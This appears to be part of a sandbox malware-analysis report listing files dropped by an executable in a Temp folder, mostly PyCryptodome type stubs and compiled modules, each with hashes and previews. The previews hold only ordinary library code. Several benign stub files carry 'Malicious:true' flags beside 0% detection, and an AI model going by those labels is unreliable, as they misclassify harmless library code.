                                                                                                                                            SHA-512:D289DAD5AF18F6A634CE35D8F3514A55B22C084B47CD24D59B8BD5A3649EDE2B385FBD9AE92164A83787C95B1AEC33929EB89E4645AA32236F4C30234B616631
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1590
                                                                                                                                            Entropy (8bit):4.436811038410909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                            MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                            SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                            SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                            SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8190
                                                                                                                                            Entropy (8bit):5.265778755351852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:AQRS6kvV9AtXEshfxCx7l7mFadVgrPqBP6sQLR7DHdMwqc5p3hxhSmAJiqXq:Ad9psh27eaGv9Xh+JN6
                                                                                                                                            MD5:F6ADD26B4B48BFBA494ABE5991C0DB91
                                                                                                                                            SHA1:6270D583B457E4F1C73059CA64138F6BBFA431FD
                                                                                                                                            SHA-256:3853A04A3E41D042BDE3FA3A33F9DD31C9623D6C35DE4EDB02564D9108FEDFFE
                                                                                                                                            SHA-512:36827FEEDAB8A43A5DEEC6E94E43491A78BACA2EE7DB90CD4D89BCC9FDC2AF2B027D3922993BED1DC9FA1291695914EFCD02A23E280F0B021B1B0B56B1DE3EB9
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):611
                                                                                                                                            Entropy (8bit):4.857553785112337
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                            MD5:12949DC06561F6F7C431BFB79A4F5D05
                                                                                                                                            SHA1:68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
                                                                                                                                            SHA-256:652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
                                                                                                                                            SHA-512:5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24763
                                                                                                                                            Entropy (8bit):5.41511665486075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/ShWw4SgqFGRVwkJRkPM4SjL8Tn4klTfZkgMybU7BS7ocYybm7meag9:/bw4SgqMOU9L+9OgMybUE7x/JM
                                                                                                                                            MD5:CC4A7CDD83E2ECA16BA0CD668E24C7AE
                                                                                                                                            SHA1:8A61E8B6BB501C0DA1413436FACC1C0AEBFBFBAC
                                                                                                                                            SHA-256:249FF5A47BA847DE2323432B62217211F637DE662A906DF562385F3246FB270A
                                                                                                                                            SHA-512:4B1AEC3FB1A560F4DCCB3A42627BB74EBC6142B539DB29EA4D32CA619C12FCE14700973D36E8D9BFE420DEA03DF5B4548B7184A38D3A236CDF0089E236FE82C4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.U........................,.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...e...............Z.d...Z...e...............Z...G.d...d.e...............Z d...Z!..e!d.d.................Z"..G.d...d.e...............Z#d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c..........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1586
                                                                                                                                            Entropy (8bit):4.431900531457141
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                            MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                            SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                            SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                            SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21445
                                                                                                                                            Entropy (8bit):5.341745289246349
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:iqHGPqi2jpRJF44h3R422oD9eWWEne47l8vadgETqZr0Txp9h5j:isGPqJRjhBYZQqa9qhmP9h5j
                                                                                                                                            MD5:73656658F6FE5B3B135762619FAB09A1
                                                                                                                                            SHA1:48F3CFAC1B74E62C0F21AA25430C560B96E7121C
                                                                                                                                            SHA-256:18FCE2FE11B299A461C8948B217200751611D151190CD88F66E548B78F236265
                                                                                                                                            SHA-512:338DFAD2A6684E5F57A4889FBDA2B37124A9FF8259415C9C3E25017C3020B84063750F3C259A35C152580A40CF7BCA5A8887FDEACF383AE1504E0D9B459BDCC1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.O..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1267
                                                                                                                                            Entropy (8bit):4.510576229003074
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                            MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                            SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                            SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                            SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10307
                                                                                                                                            Entropy (8bit):5.268925541267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Bby5NPuxI7HU4JWVU4w8GZZkZZZZAj17/oAAAFJ:k37HTJWVTwTjFv
                                                                                                                                            MD5:996615F27329EA6FFD55F7A2F77EAC7E
                                                                                                                                            SHA1:11C6C1E4621EF1192F4880404A1166B4153CF977
                                                                                                                                            SHA-256:7C56BB4712F4126ECEEFF12CA3C91390F8319A44DC809A57670829A6CC9AECA6
                                                                                                                                            SHA-512:82E2F5F1BF25436A8AF1DF324E2DF077AC3354A2ED2EA77DD6F2F9652DE19140CC6AC5FEEC06CAAF0E1742D2B3892399752C0A8FF09A61D88DF503737FEBEA79
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.(.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):716
                                                                                                                                            Entropy (8bit):4.736539689518066
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
                                                                                                                                            MD5:AFB364F0C9ADDDBA29076577257DFC52
                                                                                                                                            SHA1:208940A0B5304122118AD8E33CB8B8AF35228146
                                                                                                                                            SHA-256:C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
                                                                                                                                            SHA-512:00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6366
                                                                                                                                            Entropy (8bit):5.4439471629916625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:V8N+Z1+r1IGXmyaFst834mGPUAt834wmp60nxBXGskD+Uv:U+qZR7FU44OU4RpRxEn
                                                                                                                                            MD5:C5C41BC7CBC0571D3FFEC0BFEAABD63D
                                                                                                                                            SHA1:18EBC25E2833FA858DCF458A7413AD45404CA1A0
                                                                                                                                            SHA-256:294A72AA655F44F9AE189ABC901E115D88BB6AABAB078B851804B604B61FFA7D
                                                                                                                                            SHA-512:8B33C06B727D82DCCD99BA01611A35058D805EF5109D9435469412D30EB55DD2313CB55548C0FB25EABE4C19E6409267521EA3E9FB95820BAF6312FF14CC703D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e[.........................J.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc.....................$.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c.....................d.....|.j.........|._.........d.|._...........|.j.........|.|.j.........f.d.|.j...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):576
                                                                                                                                            Entropy (8bit):4.621504702467695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                            MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                            SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                            SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                            SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):936
                                                                                                                                            Entropy (8bit):4.361612751830179
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                            MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                            SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                            SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                            SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):236
                                                                                                                                            Entropy (8bit):4.806129043337596
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                            MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                            SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                            SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                            SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                            MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                            SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                            SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                            SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):551
                                                                                                                                            Entropy (8bit):4.846633197285402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                            MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                            SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                            SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                            SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7654
                                                                                                                                            Entropy (8bit):5.238544441031523
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:wiCykvVEVo/Ed5X8qln3H4aDJDbqOs6Q1Xhe1ztQDa6zSDB7M7VxxxxxxxxxxxxI:wrEJ3oaVbqAQNhiCDpS
                                                                                                                                            MD5:278E65663DEC597197EF0DD8E6561860
                                                                                                                                            SHA1:C2CBBB283BB49BB0245C0AEDB7389F4AF8E86EAF
                                                                                                                                            SHA-256:BB2B379EB21A3E40E52633A93124265F9A1D6BA019A6E23EFAF66ECE6A055318
                                                                                                                                            SHA-512:8345BD32F5713F9FE78D9D027B01AC58452CE992DBF121A51B11E8F8AE9F6D9739D790247AF468AF1343FA8C50FF9CEE253904EAADA92B2A9EBE4C60A4018F71
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................|.....d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.d.Z.d.Z.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):511
                                                                                                                                            Entropy (8bit):4.765158993873355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                            MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                            SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                            SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                            SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):689
                                                                                                                                            Entropy (8bit):4.617411626220112
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                            MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                            SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                            SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
